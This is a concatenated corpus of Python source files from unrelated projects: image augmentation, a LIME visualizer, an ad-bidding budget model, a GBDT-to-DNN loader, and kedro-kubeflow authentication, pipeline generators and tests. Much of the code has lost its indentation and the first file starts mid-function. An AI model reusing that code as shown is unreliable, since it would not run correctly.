xh, xw = image.shape[:2]
if scale is None:
            # if scale is not defined, snap the size to the nearest multiple
scale = float(xh)/(xh//self.args.multiple)/self.args.multiple
#float(xw)/(xw//self.args.multiple)/self.args.multiple,
scale = scale, scale
elif isinstance(scale, numbers.Number):
scale = scale, scale
elif isinstance(scale, tuple) and len(scale)>2:
            raise ValueError("scale must be a number or a 2-tuple")
        new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1)  # OpenCV's resize expects (w, h)
# image = image[::inv_resize_scale,::inv_resize_scale]
image = cv2.resize(image, new_sz)
xh, xw = image.shape[:2]
m0, m1 = xh % self.args.multiple, xw % self.args.multiple
d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1)
image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)]
if len(image.shape)==2:
return image.reshape((image.shape[0], image.shape[1], 1))
else:
return image
def flip(self, image):
do_flip_xy = np.random.randint(0, 2)
do_flip_x = np.random.randint(0, 2)
do_flip_y = np.random.randint(0, 2)
if do_flip_xy: # Transpose X and Y axis
image = image[::-1, ::-1, :]
elif do_flip_x: # Flip along Y-axis
image = image[::-1, :, :]
elif do_flip_y: # Flip along X-axis
image = image[:, ::-1, :]
return image
def scaling(self, image):
do_scale = np.random.randint(0, 2)
if do_scale:
scale = self.args.aug_params.params.scale[ \
np.random.randint(0,len(self.args.aug_params.params.scale))]
return self.resize_image(image, scale)
else:
return image
def random_brightness(self, image, max_delta=63, seed=None):
brightness_flag = np.random.randint(0, 2)
if brightness_flag:
delta = np.random.uniform(-max_delta, max_delta)
return image + delta
else:
return image
def random_contrast(self, image, lower=0.2, upper=1.8, seed=None):
contrast_flag = np.random.randint(0, 2)
if contrast_flag:
            factor = np.random.uniform(lower, upper)
im_mean = image.mean(axis=2)
return ((image.transpose(2, 0, 1) - im_mean)*factor + im_mean).transpose(1,2,0).astype(np.uint8)
else:
return image
def shift_image(self, image):
do_shift_xy = np.random.randint(0, 2)
do_shift_x = np.random.randint(0, 2)
do_shift_y = np.random.randint(0, 2)
if do_shift_xy:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_y:
lr_shift = 0
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_x:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = 0
        if do_shift_xy or do_shift_x or do_shift_y:
h, w, ch = image.shape
            affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]])  # horizontal, vertical
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def rotate_image(self, image):
do_rotate = np.random.randint(0, 2)
if do_rotate:
h, w, ch = image.shape
rotation_angle = self.args.aug_params.params.rotation_angle[ \
np.random.randint(0,len(self.args.aug_params.params.rotation_angle))]
affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1)
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def crop_image(self, image):
h, w, ch = image.shape
top = int((w-self.args.crop_params.size)/2)
left = int((h-self.args.crop_params.size)/2)
return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:]
def __reshpe_channel(self, image, im_shape ):
if len(image.shape)==2:
return image.reshape(im_shape)
else:
return image
``` |
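A hedged sketch of wiring a `DatasetMixin` loader like the one above into a chainer iterator (MNIST is used here only so the snippet is runnable; `DatasetPreProcessor` plugs in the same way once its EasyDict `args` is assembled):
```python
import chainer

# Any chainer DatasetMixin works with SerialIterator.
train, _ = chainer.datasets.get_mnist()
iterator = chainer.iterators.SerialIterator(train, batch_size=32, shuffle=True)

images_and_labels = iterator.next()  # list of (feature, label) pairs
print(len(images_and_labels))        # 32
```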
{
"source": "0shimax/Easy-Over-Complete-Distribution",
"score": 3
} |
#### File: src/feature/data_loader.py
```python
from pathlib import Path
import numpy
from skimage import io
import torch
from torch.utils.data import Dataset
from PIL import Image
from feature.utils import ImageTransform
class WBCDataset(Dataset):
def __init__(self, image_labels, root_dir,
subset="Dataset1", transform=ImageTransform()):
super().__init__()
self.image_labels = image_labels
self.root_dir = root_dir
self.subset = subset
self.transform = transform
def __len__(self):
return len(self.image_labels)
def __getitem__(self, idx):
img_name, label = self.image_labels[idx]
image_path = Path(self.root_dir, self.subset, "{0:03}.bmp".format(img_name))
image = io.imread(image_path)
if self.transform:
image = Image.fromarray(numpy.uint8(image))
image = self.transform(image)
return image, torch.LongTensor([label])
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=4)
return loader
```
#### File: model/visualizer/lime_visualizer.py
```python
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import torch
from skimage.segmentation import mark_boundaries
from lime import lime_image
explainer = lime_image.LimeImageExplainer()
def normalize(x):
return np.array((x - np.min(x)) / (np.max(x) - np.min(x)))
def visualize(args, image, predict_fn, img_idx, label_id, gt_id, num_samples=1000):
    # (1, C, H, W) tensor -> (H, W, C) numpy array, as LIME expects
    data = image.transpose(2, 1).transpose(3, 2).squeeze(0).numpy()
explanation = explainer.explain_instance(data, predict_fn, top_labels=5, hide_color=0, num_samples=num_samples)
temp, mask = explanation.get_image_and_mask(int(gt_id), positive_only=False, num_features=1000, hide_rest=True)
out = mark_boundaries(temp / 2 + 0.5, mask)
out = normalize(out)
plt.imsave(Path(args.out_dir, "visualized", "testimg{}_gt{}_pred{}.jpeg".format(img_idx, gt_id, label_id)), out)
plt.imsave(Path(args.out_dir, "visualized", "testimg{}.jpeg".format(img_idx)), normalize(data))
``` |
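`visualize` takes a `predict_fn` that LIME calls on batches of HWC numpy images; a hedged sketch wrapping a torch classifier (the `model` argument is hypothetical):
```python
import numpy as np
import torch
import torch.nn.functional as F

def make_predict_fn(model, device="cpu"):
    model.eval()
    def predict_fn(images: np.ndarray) -> np.ndarray:
        # LIME passes (N, H, W, C); torch expects (N, C, H, W).
        batch = torch.from_numpy(images).permute(0, 3, 1, 2).float().to(device)
        with torch.no_grad():
            logits = model(batch)
        return F.softmax(logits, dim=1).cpu().numpy()
    return predict_fn
```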
{
"source": "0shimax/effective-budget-management",
"score": 3
} |
#### File: src/model/bid.py
```python
from dataclasses import dataclass, field
import math
import numpy
from scipy.optimize import curve_fit
from model.sub_funcs import imp_for_bid_price, win_rate, calculate_mprice
@dataclass
class bid(object):
n_of_time_slot: int = 0
current_time_slot: int = 0
average_market_price: float = 0.0
    # mutable defaults are forbidden in dataclasses; use default_factory
    ideal_spend: dict = field(default_factory=dict)
    current_spend: dict = field(default_factory=dict)
# win-rate vs budget distribution params
bid_pram_k_1: float = 1e-3
bid_pram_k_2: float = 1e-3
bid_pram_lambda: float = 1e-3
# budget
total_budget: float = 0.0
    slot_budget: dict = field(default_factory=dict)
    pctr_threshold: dict = field(default_factory=dict)
# power-law distribution params
dist_param_c: float = 1e-3
dist_param_alpha: float = 1e-3
def set_market_price(
self, pctrs: numpy.ndarray, mprices: numpy.ndarray, threshold: float
) -> None:
self.average_market_price = calculate_mprice(pctrs, mprices, threshold)
    def fit_imp_bid_func(self, n_of_imps: numpy.ndarray, bid_prices: numpy.ndarray):
        # curve_fit(f, xdata, ydata): the bid price is the independent variable
        popt, _ = curve_fit(imp_for_bid_price, bid_prices, n_of_imps)
        self.dist_param_c, self.dist_param_alpha = popt
    def fit_win_rate_func(self, win_rates: numpy.ndarray, bid_prices: numpy.ndarray):
        popt, _ = curve_fit(win_rate, bid_prices, win_rates)
        self.bid_pram_k_1, self.bid_pram_k_2 = popt
def bid_price(self) -> float:
tmp = self.bid_pram_lambda * self.bid_pram_k_2 ** 2
tmp += self.pctr() * self.bid_pram_k_1 * self.bid_pram_k_2
tmp /= self.bid_pram_lambda * self.bid_pram_k_1 ** 2
tmp = math.sqrt(tmp)
tmp -= self.bid_pram_k_2 / self.bid_pram_k_1
return self.adjustment_by_sp() * tmp
def pctr(self) -> float:
pass
def adjustment_by_sp(self) -> float:
return (
self.ideal_spend[self.current_time_slot]
/ self.current_spend[self.current_time_slot]
)
def update_budget_for_each_slot(self) -> None:
slot_budgets = self.slot_budget.values()
tmp = self.total_budget - sum(
[self.current_spend[i] for i in range(1, self.current_time_slot)]
)
tmp *= self.slot_budget[self.current_time_slot]
tmp /= sum(slot_budgets)
self.slot_budget[self.current_time_slot] = tmp
def update_pctr_threshold(self) -> None:
tmp = 1.0 - self.dist_param_alpha
tmp /= (
self.dist_param_c
* self.average_market_price
* self.slot_budget[self.current_time_slot]
)
self.pctr_threshold[
self.current_time_slot
] = 1.0 - self.dist_param_alpha * math.sqrt(1 - tmp)
``` |
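`model.sub_funcs` is not shown in this section; the following is a hedged sketch of functional forms consistent with how the fitted parameters are used above. The power-law impression curve and the saturating win-rate curve are assumptions (the latter chosen so that the closed-form `bid_price` above matches an ORTB-style derivation), not the repository's actual definitions:
```python
import numpy


def imp_for_bid_price(bid_price, c, alpha):
    # Assumed power law: impressions winnable at a given bid price.
    return c * numpy.power(bid_price, alpha)


def win_rate(bid_price, k_1, k_2):
    # Assumed saturating curve: w(b) = k1*b / (k2 + k1*b) -> 1 as b grows.
    return k_1 * bid_price / (k_2 + k_1 * bid_price)
```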
{
"source": "0shimax/GBDT2DNN",
"score": 3
} |
#### File: src/data/data_loader.py
```python
from pathlib import Path
import torch
from torch.utils.data import Dataset
class MyDataset(Dataset):
def __init__(self, features, labels, gbdt_model, transform=None, is_train=False):
super().__init__()
self.transform = transform
self.is_train = is_train
self.features = features
self.labels = labels
self.gbdt_model = gbdt_model
def __len__(self):
return len(self.features)
def __getitem__(self, idx):
feature = self.features[idx]
label = self.labels[idx]
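        # leaf indices from the GBDT become categorical inputs for the DNN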
feature_for_dnn = self.gbdt_model.apply(feature.reshape(1, -1))
return torch.LongTensor([feature_for_dnn]), torch.LongTensor([label])
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=4)
return loader
``` |
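A hedged end-to-end sketch (data shapes and the sklearn GBDT are illustrative; `apply` returning per-tree leaf indices is standard sklearn behaviour):
```python
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier

from data.data_loader import MyDataset, loader

X = np.random.randn(256, 20)
y = (X[:, 0] > 0).astype(np.int64)

gbdt = GradientBoostingClassifier(n_estimators=30).fit(X, y)

dataset = MyDataset(X, y, gbdt, is_train=True)
for leaf_ids, labels in loader(dataset, batch_size=32):
    # leaf_ids: one leaf index per tree, usable as embedding lookups
    print(leaf_ids.shape, labels.shape)
    break
```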
{
"source": "0shimax/kedro-kubeflow",
"score": 2
} |
#### File: kedro-kubeflow/kedro_kubeflow/auth.py
```python
import logging
import os
import re
from urllib.parse import urlsplit, urlunsplit
import requests
IAP_CLIENT_ID = "IAP_CLIENT_ID"
DEX_USERNAME = "DEX_USERNAME"
DEX_PASSWORD = "<PASSWORD>"
class AuthHandler(object):
log = logging.getLogger(__name__)
def obtain_id_token(self):
from google.auth.exceptions import DefaultCredentialsError
from google.auth.transport.requests import Request
from google.oauth2 import id_token
client_id = os.environ.get(IAP_CLIENT_ID, None)
jwt_token = None
if not client_id:
self.log.debug(
"No IAP_CLIENT_ID provided, skipping custom IAP authentication"
)
return jwt_token
try:
self.log.debug("Attempt to get IAP token for %s." + client_id)
jwt_token = id_token.fetch_id_token(Request(), client_id)
self.log.info("Obtained JWT token for IAP proxy authentication.")
except DefaultCredentialsError as ex:
self.log.warning(
str(ex)
+ (
" Note that this authentication method does not work with default"
" credentials obtained via 'gcloud auth application-default login'"
" command. Refer to documentation on how to configure service account"
" locally"
" (https://cloud.google.com/docs/authentication/production#manually)"
)
)
except Exception as e:
self.log.error("Failed to obtain IAP access token. " + str(e))
finally:
return jwt_token
def obtain_dex_authservice_session(self, kfp_api):
if DEX_USERNAME not in os.environ or DEX_PASSWORD not in os.environ:
self.log.debug(
"Skipping DEX authentication due to missing env variables"
)
return None
s = requests.Session()
r = s.get(kfp_api)
form_relative_url = re.search(
'/dex/auth/local\\?req=([^"]*)', r.text
).group(0)
kfp_url_parts = urlsplit(kfp_api)
form_absolute_url = urlunsplit(
[
kfp_url_parts.scheme,
kfp_url_parts.netloc,
form_relative_url,
None,
None,
]
)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
}
data = {
"login": os.environ[DEX_USERNAME],
"password": <PASSWORD>[DEX_PASSWORD],
}
s.post(form_absolute_url, headers=headers, data=data)
return s.cookies.get_dict()["authservice_session"]
```
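A hedged sketch of consuming the Dex session (the endpoint is illustrative; passing the cookie through `kfp.Client(..., cookies=...)` is the usual pattern for Dex-protected Kubeflow deployments):
```python
import kfp

from kedro_kubeflow.auth import AuthHandler

kfp_api = "http://localhost:8080/pipeline"  # illustrative endpoint
session = AuthHandler().obtain_dex_authservice_session(kfp_api)

client = kfp.Client(
    host=kfp_api,
    cookies=f"authservice_session={session}" if session else None,
)
print(client.list_experiments())
```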
#### File: kedro_kubeflow/generators/pod_per_node_pipeline_generator.py
```python
import contextlib
import logging
from typing import Dict, Set
import kubernetes.client as k8s
from kedro.pipeline.node import Node
from kfp import dsl
from kfp.compiler._k8s_helper import sanitize_k8s_name
from ..utils import clean_name, is_mlflow_enabled
from .utils import (
create_arguments_from_parameters,
create_command_using_params_dumper,
create_container_environment,
maybe_add_params,
)
class PodPerNodePipelineGenerator(object):
log = logging.getLogger(__name__)
def __init__(self, config, project_name, context):
self.project_name = project_name
self.context = context
dsl.ContainerOp._DISABLE_REUSABLE_COMPONENT_WARNING = True
self.run_config = config.run_config
self.catalog = context.config_loader.get("catalog*")
def configure_max_cache_staleness(self, kfp_ops):
if self.run_config.max_cache_staleness not in [None, ""]:
for _, op in kfp_ops.items():
op.execution_options.caching_strategy.max_cache_staleness = (
self.run_config.max_cache_staleness
)
def generate_pipeline(self, pipeline, image, image_pull_policy):
@dsl.pipeline(
name=self.project_name,
description=self.run_config.description,
)
@maybe_add_params(self.context.params)
def convert_kedro_pipeline_to_kfp() -> None:
"""Convert from a Kedro pipeline into a kfp container graph."""
dsl.get_pipeline_conf().set_ttl_seconds_after_finished(
self.run_config.ttl
)
node_dependencies = self.context.pipelines.get(
pipeline
).node_dependencies
with self._create_pipeline_exit_handler(
pipeline, image, image_pull_policy
):
kfp_ops = self._build_kfp_ops(
pipeline, node_dependencies, image, image_pull_policy
)
self.configure_max_cache_staleness(kfp_ops)
for node, dependencies in node_dependencies.items():
for dependency in dependencies:
kfp_ops[node.name].after(kfp_ops[dependency.name])
return convert_kedro_pipeline_to_kfp
def _create_pipeline_exit_handler(
self, pipeline, image, image_pull_policy
):
enable_volume_cleaning = (
self.run_config.volume is not None
and not self.run_config.volume.keep
)
if not enable_volume_cleaning and not self.run_config.on_exit_pipeline:
return contextlib.nullcontext()
commands = []
if enable_volume_cleaning:
commands.append(
"kedro kubeflow delete-pipeline-volume "
"{{workflow.name}}-"
+ sanitize_k8s_name(f"{pipeline}-data-volume")
)
if self.run_config.on_exit_pipeline:
commands.append(
"kedro run "
"--config config.yaml "
f"--env {self.context.env} "
f"--pipeline {self.run_config.on_exit_pipeline}"
)
exit_container_op = dsl.ContainerOp(
name="on-exit",
image=image,
command=create_command_using_params_dumper(";".join(commands)),
arguments=create_arguments_from_parameters(
self.context.params.keys()
)
+ [
"status",
"{{workflow.status}}",
"failures",
"{{workflow.failures}}",
],
container_kwargs={"env": create_container_environment()},
)
if self.run_config.max_cache_staleness not in [None, ""]:
exit_container_op.execution_options.caching_strategy.max_cache_staleness = (
self.run_config.max_cache_staleness
)
return dsl.ExitHandler(
self._customize_op(exit_container_op, image_pull_policy)
)
def _build_kfp_ops(
self,
pipeline,
node_dependencies: Dict[Node, Set[Node]],
image,
image_pull_policy,
) -> Dict[str, dsl.ContainerOp]:
"""Build kfp container graph from Kedro node dependencies."""
kfp_ops = {}
node_volumes = (
self._setup_volumes(
f"{pipeline}-data-volume", image, image_pull_policy
)
if self.run_config.volume is not None
else {}
)
nodes_env = create_container_environment()
if is_mlflow_enabled():
kfp_ops["mlflow-start-run"] = self._customize_op(
dsl.ContainerOp(
name="mlflow-start-run",
image=image,
command=["kedro"],
arguments=[
"kubeflow",
"--env",
self.context.env,
"mlflow-start",
dsl.RUN_ID_PLACEHOLDER,
],
container_kwargs={"env": nodes_env},
file_outputs={"mlflow_run_id": "/tmp/mlflow_run_id"},
),
image_pull_policy,
)
nodes_env.append(
k8s.V1EnvVar(
name="MLFLOW_RUN_ID",
value=kfp_ops["mlflow-start-run"].output,
)
)
for node in node_dependencies:
name = clean_name(node.name)
kwargs = {"env": nodes_env}
if self.run_config.resources.is_set_for(node.name):
kwargs["resources"] = k8s.V1ResourceRequirements(
limits=self.run_config.resources.get_for(node.name),
requests=self.run_config.resources.get_for(node.name),
)
kfp_ops[node.name] = self._customize_op(
dsl.ContainerOp(
name=name,
image=image,
command=create_command_using_params_dumper(
"kedro "
"run "
f"--env {self.context.env} "
f"--pipeline {pipeline} "
f"--node {node.name} "
f"--config config.yaml"
),
arguments=create_arguments_from_parameters(
self.context.params.keys()
),
pvolumes=node_volumes,
container_kwargs=kwargs,
file_outputs={
output: "/home/kedro/"
+ self.catalog[output]["filepath"]
for output in node.outputs
if output in self.catalog
and "filepath" in self.catalog[output]
and self.run_config.store_kedro_outputs_as_kfp_artifacts
},
),
image_pull_policy,
)
return kfp_ops
def _customize_op(self, op, image_pull_policy):
op.container.set_image_pull_policy(image_pull_policy)
if self.run_config.volume and self.run_config.volume.owner is not None:
op.container.set_security_context(
k8s.V1SecurityContext(run_as_user=self.run_config.volume.owner)
)
return op
def _setup_volumes(self, volume_name, image, image_pull_policy):
vop = dsl.VolumeOp(
name="data-volume-create",
resource_name=volume_name,
size=self.run_config.volume.size,
modes=self.run_config.volume.access_modes,
storage_class=self.run_config.volume.storageclass,
)
if self.run_config.max_cache_staleness not in [None, ""]:
vop.add_pod_annotation(
"pipelines.kubeflow.org/max_cache_staleness",
self.run_config.max_cache_staleness,
)
if self.run_config.volume.skip_init:
return {"/home/kedro/data": vop.volume}
else:
volume_init = self._customize_op(
dsl.ContainerOp(
name="data-volume-init",
image=image,
command=["sh", "-c"],
arguments=[
" ".join(
[
"cp",
"--verbose",
"-r",
"/home/kedro/data/*",
"/home/kedro/datavolume",
]
)
],
pvolumes={"/home/kedro/datavolume": vop.volume},
),
image_pull_policy,
)
return {"/home/kedro/data": volume_init.pvolume}
```
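The function returned by `generate_pipeline` is a plain kfp pipeline function, so it can be compiled to a workflow package with the stock kfp compiler. A minimal sketch, assuming `config` and `context` have already been built by the plugin (they are placeholders here):
```python
# Sketch only: `config` and `context` are assumed to come from the plugin's own setup.
import kfp.compiler

generator = PodPerNodePipelineGenerator(config, "my-project", context)
pipeline_func = generator.generate_pipeline(
    "__default__", image="registry.example.com/image:latest",
    image_pull_policy="IfNotPresent")
kfp.compiler.Compiler().compile(pipeline_func, "pipeline.yaml")
```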
#### File: kedro_kubeflow/vertex_ai/client.py
```python
import json
import logging
import os
from tempfile import NamedTemporaryFile
from google.cloud.scheduler_v1.services.cloud_scheduler import (
CloudSchedulerClient,
)
from kfp.v2 import compiler
from kfp.v2.google.client import AIPlatformClient
from tabulate import tabulate
from .generator import PipelineGenerator
class VertexAIPipelinesClient:
"""
Client for Vertex AI Pipelines.
"""
log = logging.getLogger(__name__)
def __init__(self, config, project_name, context):
self.generator = PipelineGenerator(config, project_name, context)
self.api_client = AIPlatformClient(
project_id=config.project_id, region=config.region
)
self.cloud_scheduler_client = CloudSchedulerClient()
self.location = (
f"projects/{config.project_id}/locations/{config.region}"
)
self.run_config = config.run_config
def list_pipelines(self):
"""
List all the jobs (current and historical) on Vertex AI Pipelines
:return:
"""
pipelines = self.api_client.list_jobs()["pipelineJobs"]
return tabulate(
map(lambda x: [x.get("displayName"), x["name"]], pipelines),
headers=["Name", "ID"],
)
def run_once(
self,
pipeline,
image,
experiment_name,
run_name,
wait=False,
image_pull_policy="IfNotPresent",
experiment_namespace=None,
):
"""
Runs the pipeline in Vertex AI Pipelines
:param pipeline:
:param image:
:param experiment_name:
:param run_name:
:param wait:
:param image_pull_policy:
:return:
"""
with NamedTemporaryFile(
mode="rt", prefix="kedro-kubeflow", suffix=".json"
) as spec_output:
self.compile(
pipeline,
image,
output=spec_output.name,
image_pull_policy=image_pull_policy,
)
run = self.api_client.create_run_from_job_spec(
service_account=os.getenv("SERVICE_ACCOUNT"),
job_spec_path=spec_output.name,
job_id=run_name,
pipeline_root=f"gs://{self.run_config.root}",
parameter_values={},
enable_caching=False,
network=self.run_config.vertex_ai_networking.vpc,
)
self.log.info("Run created %s", str(run))
return run
def compile(
self,
pipeline,
image,
output,
image_pull_policy="IfNotPresent",
):
"""
Creates json file in given local output path
:param pipeline:
:param image:
:param output:
:param image_pull_policy:
:return:
"""
token = os.getenv("MLFLOW_TRACKING_TOKEN")
pipeline_func = self.generator.generate_pipeline(
pipeline, image, image_pull_policy, token
)
compiler.Compiler().compile(
pipeline_func=pipeline_func,
package_path=output,
)
self.log.info(
"Generated pipeline definition was saved to %s", str(output)
)
def upload(self, pipeline, image, image_pull_policy="IfNotPresent"):
"""
Upload is not supported by Vertex AI Pipelines
:param pipeline:
:param image:
:param image_pull_policy:
:return:
"""
raise NotImplementedError("Upload is not supported for VertexAI")
def _cleanup_old_schedule(self, pipeline_name):
"""
Removes old jobs scheduled for given pipeline name
"""
for job in self.cloud_scheduler_client.list_jobs(parent=self.location):
if "jobs/pipeline_pipeline" not in job.name:
continue
job_pipeline_name = json.loads(job.http_target.body)[
"pipelineSpec"
]["pipelineInfo"]["name"]
if job_pipeline_name == pipeline_name:
self.log.info(
"Found existing schedule for the pipeline at %s, deleting...",
job.schedule,
)
self.cloud_scheduler_client.delete_job(name=job.name)
def schedule(
self,
pipeline,
experiment_name,
experiment_namespace,
cron_expression,
image_pull_policy="IfNotPresent",
):
"""
Schedule pipeline to Vertex AI with given cron expression
:param pipeline:
:param experiment_name:
:param experiment_namespace:
:param cron_expression:
:param image_pull_policy:
:return:
"""
self._cleanup_old_schedule(self.generator.get_pipeline_name())
with NamedTemporaryFile(
mode="rt", prefix="kedro-kubeflow", suffix=".json"
) as spec_output:
self.compile(
pipeline,
self.run_config.image,
output=spec_output.name,
image_pull_policy=image_pull_policy,
)
self.api_client.create_schedule_from_job_spec(
job_spec_path=spec_output.name,
time_zone="Etc/UTC",
schedule=cron_expression,
pipeline_root=f"gs://{self.run_config.root}",
enable_caching=False,
)
self.log.info("Pipeline scheduled to %s", cron_expression)
```
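A minimal usage sketch of the client; `config` and `context` are placeholders for the plugin's own objects, and the image and run names are made up:
```python
# Sketch only: config/context construction is outside this snippet.
client = VertexAIPipelinesClient(config, "my-project", context)
print(client.list_pipelines())
client.run_once(
    pipeline="__default__",
    image="gcr.io/my-project/image:latest",
    experiment_name="exp",
    run_name="run-001",
)
```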
#### File: kedro-kubeflow/tests/test_auth.py
```python
import os
import unittest
from unittest.mock import patch
import responses
from google.auth.exceptions import DefaultCredentialsError
from kedro_kubeflow.auth import AuthHandler
class TestAuthHandler(unittest.TestCase):
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_error_on_invalid_creds(self, fetch_id_token_mock):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.side_effect = Exception()
with self.assertLogs("kedro_kubeflow.auth", level="ERROR") as cm:
# when
token = AuthHandler().obtain_id_token()
# then
assert "Failed to obtain IAP access token" in cm.output[0]
# then
assert token is None
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_warn_if_trying_to_use_default_creds(
self, fetch_id_token_mock
):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.side_effect = DefaultCredentialsError()
with self.assertLogs("kedro_kubeflow.auth", level="WARNING") as cm:
# when
token = AuthHandler().obtain_id_token()
# then
assert (
"this authentication method does not work with default credentials"
in cm.output[0]
)
assert token is None
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_provide_valid_token(self, fetch_id_token_mock):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.return_value = "TOKEN"
# when
token = AuthHandler().obtain_id_token()
# then
assert token == "TOKEN"
def test_should_skip_dex_auth_if_env_is_not_set(self):
# given
# no env set
# when
session = AuthHandler().obtain_dex_authservice_session(None)
# then
assert session is None
def test_should_skip_dex_auth_if_env_is_incomplete(self):
# given
os.environ["DEX_USERNAME"] = "<EMAIL>"
# no password set
# when
session = AuthHandler().obtain_dex_authservice_session(None)
# then
assert session is None
def tearDown(self):
if "DEX_USERNAME" in os.environ:
del os.environ["DEX_USERNAME"]
if "DEX_PASSWORD" in os.environ:
del os.environ["DEX_PASSWORD"]
if "IAP_CLIENT_ID" in os.environ:
del os.environ["IAP_CLIENT_ID"]
@responses.activate
def test_should_get_cookie_from_dex_secured_system(self):
# given
os.environ["DEX_USERNAME"] = "<EMAIL>"
os.environ["DEX_PASSWORD"] = "pa$$"
responses.add(
responses.GET,
"https://kubeflow.local/pipeline",
body='<a href="/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae" target="_self"',
)
responses.add(
responses.POST,
"https://kubeflow.local/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae",
headers={"Set-cookie": "authservice_session=sessionID"},
)
# when
session = AuthHandler().obtain_dex_authservice_session(
"https://kubeflow.local/pipeline"
)
# then
assert session == "sessionID"
assert (
responses.calls[1].request.body
== "login=user%40example.com&password=pa%24%24"
)
```
#### File: kedro-kubeflow/tests/test_one_pod_pipeline_generator.py
```python
import os
import unittest
from inspect import signature
from unittest.mock import MagicMock
import kfp
from kedro.pipeline import Pipeline, node
from kedro_kubeflow.config import PluginConfig
from kedro_kubeflow.generators.one_pod_pipeline_generator import (
OnePodPipelineGenerator,
)
def identity(input1: str):
return input1 # pragma: no cover
class TestGenerator(unittest.TestCase):
def test_support_modification_of_pull_policy(self):
# given
self.create_generator()
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Never"
)()
# then
assert len(dsl_pipeline.ops) == 1
assert dsl_pipeline.ops["pipeline"].container.image == "unittest-image"
assert (
dsl_pipeline.ops["pipeline"].container.image_pull_policy == "Never"
)
def test_should_support_params_and_inject_them_to_the_node(self):
# given
self.create_generator(params={"param1": 0.3, "param2": 42})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
pipeline = self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)
default_params = signature(pipeline).parameters
pipeline()
# then
assert len(default_params) == 2
assert default_params["param1"].default == 0.3
assert default_params["param2"].default == 42
assert dsl_pipeline.ops["pipeline"].container.args[1:] == [
"param1",
"{{pipelineparam:op=;name=param1}}",
"param2",
"{{pipelineparam:op=;name=param2}}",
]
def test_should_not_add_resources_spec_if_not_requested(self):
# given
self.create_generator(config={})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].container.resources is None
def test_should_add_resources_spec(self):
# given
self.create_generator(
config={
"resources": {
"__default__": {"cpu": "100m", "memory": "8Gi"},
"node1": {"cpu": "400m", "memory": "64Gi"},
}
}
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
resources = dsl_pipeline.ops["pipeline"].container.resources
assert resources.limits == {"cpu": "100m", "memory": "8Gi"}
assert resources.requests == {"cpu": "100m", "memory": "8Gi"}
def test_should_set_description(self):
# given
self.create_generator(config={"description": "DESC"})
# when
pipeline = self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Never"
)
# then
assert pipeline._component_description == "DESC"
def test_artifact_registration(self):
# given
self.create_generator(
catalog={
"B": {
"type": "pandas.CSVDataSet",
"filepath": "data/02_intermediate/b.csv",
}
}
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].file_outputs == {
"B": "/home/kedro/data/02_intermediate/b.csv"
}
def test_should_skip_artifact_registration_if_requested(self):
# given
self.create_generator(
catalog={
"B": {
"type": "pandas.CSVDataSet",
"filepath": "data/02_intermediate/b.csv",
}
},
config={"store_kedro_outputs_as_kfp_artifacts": False},
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].file_outputs == {}
def test_should_pass_kedro_config_env_to_nodes(self):
# given
self.create_generator(params={"param1": 0.3, "param2": 42})
os.environ["KEDRO_CONFIG_MY_KEY"] = "42"
os.environ["SOME_VALUE"] = "100"
try:
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
env_values = {
e.name: e.value
for e in dsl_pipeline.ops["pipeline"].container.env
}
assert "KEDRO_CONFIG_MY_KEY" in env_values
assert env_values["KEDRO_CONFIG_MY_KEY"] == "42"
assert "SOME_VALUE" not in env_values
finally:
del os.environ["KEDRO_CONFIG_MY_KEY"]
del os.environ["SOME_VALUE"]
def test_should_pass_kubeflow_run_id_to_nodes(self):
# given
